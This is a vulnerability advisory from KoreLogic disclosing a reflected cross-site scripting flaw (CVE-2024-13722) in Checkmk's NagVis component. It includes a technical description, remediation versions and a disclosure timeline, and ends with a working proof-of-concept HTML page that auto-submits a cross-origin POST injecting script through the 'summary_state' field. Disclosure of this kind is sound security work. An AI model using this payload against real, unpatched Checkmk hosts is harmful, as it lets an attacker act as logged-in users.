KL-001-2025-001: Checkmk NagVis Reflected Cross-site Scripting

Title: Checkmk NagVis Reflected Cross-site Scripting
Advisory ID: KL-001-2025-001
Publication Date: 2025-02-04
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-001.txt


1. Vulnerability Details

     Affected Vendor: Checkmk
     Affected Product: Checkmk/NagVis
     Affected Version: Checkmk 2.3.0p2, NagVis 1.9.40
     Platform: GNU/Linux
     CWE Classification: CWE-79: Improper Neutralization of Input
                         During Web Page Generation
                         ('Cross-site Scripting')
     CVE ID: CVE-2024-13722


2. Vulnerability Description

     The "NagVis" component within Checkmk is vulnerable to reflected
     cross-site scripting. An attacker can craft a malicious link
     that will execute arbitrary JavaScript in the context of the
     browser once clicked. The attack can be performed on both
     authenticated and unauthenticated users.

3. Technical Description

     Checkmk version 2.3.0.p2 ships with a component named
     "NagVis", which is an addon for the network management
     system "Nagios". When receiving an HTTP POST request for the
     "userfiles/gadgets/std_table.php" file, the query and body
     parameters contained within the request are processed by the
     script. Specifically, the script accepts the "members" body
     parameter, which is then parsed as a JSON object.

     The "summary_state" property of the "members" JSON object is
     reflected into the page response without validation. A POST
     request containing a malicious "summary_state" value can inject
     arbitrary JavaScript via the HTML "script" tag into the page
     response. When rendered in a browser, the attacker controlled
     JavaScript executes, enabling an attacker to perform actions
     as the currently logged-in user.

     The "members" JSON object must be supplied via a POST
     body parameter, so exploitation of this issue relies
     on a cross-origin HTTP request originating from an
     attacker controlled web page. The malicious website
     (e.g. https://attacker.com/foo.html) can contain an HTML
     "form" tag with an "action" attribute pointing at the URL
     for the "std_table.php" script.  Additional JavaScript on the
     attacker controlled page can automatically submit the form once
     a user loads the page. The browser will send a POST request
     cross-origin and redirect the browser to the HTTP response of
     the POST request, thereby executing the malicious JavaScript
     on the NagVis web page.

4. Mitigation and Remediation Recommendation

     This issue has been remediated in Nagvis 1.9.42 and Checkmk
     2.3.0p10, both release 2024-07-15.


5. Credit

     This vulnerability was discovered by Jaggar Henry and Jim
     Becher of KoreLogic, Inc.


6. Disclosure Timeline

     2024-06-11 : KoreLogic reports vulnerability details to Checkmk
                  Security Team.
     2024-06-12 : Checkmk acknowledges receipt.
     2024-06-21 : Checkmk requests an extension of embargo to
                  90 business days.
     2024-07-15 : Checkmk/NagVis release versions featuring
                  remediation for the reported vulnerability.
                  Checkmk neglects to inform KoreLogic of this event.
     2024-11-22 : KoreLogic requests an update from Checkmk but
                  receives no reply.
     2025-02-04 : KoreLogic public disclosure.


7. Proof of Concept

     1) Serve the following HTML from a web server (e.g. python -m http.server)
     2) View the URL serving the file in a web browser:
         <html>
              <form method='POST' 
action='http://checkmkhost/cmk/nagvis/userfiles/gadgets/std_table.php?object_id=1337&scale=100&opts=show_service_states=foo;group_states=0;&type=dyngroup&object_types=host&state=FL'>
                   <input type='hidden' name='members' 
value='[{"summary_in_downtime":1,"summary_state":"\"><script>eval(window.name)</script>"}]'>
              </form>

              <script>
                   window.onload = function() {
                        window.name = `prompt('KoreLogic')`;
                        document.forms[0].submit();
                   }
              </script>
         </html>


The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy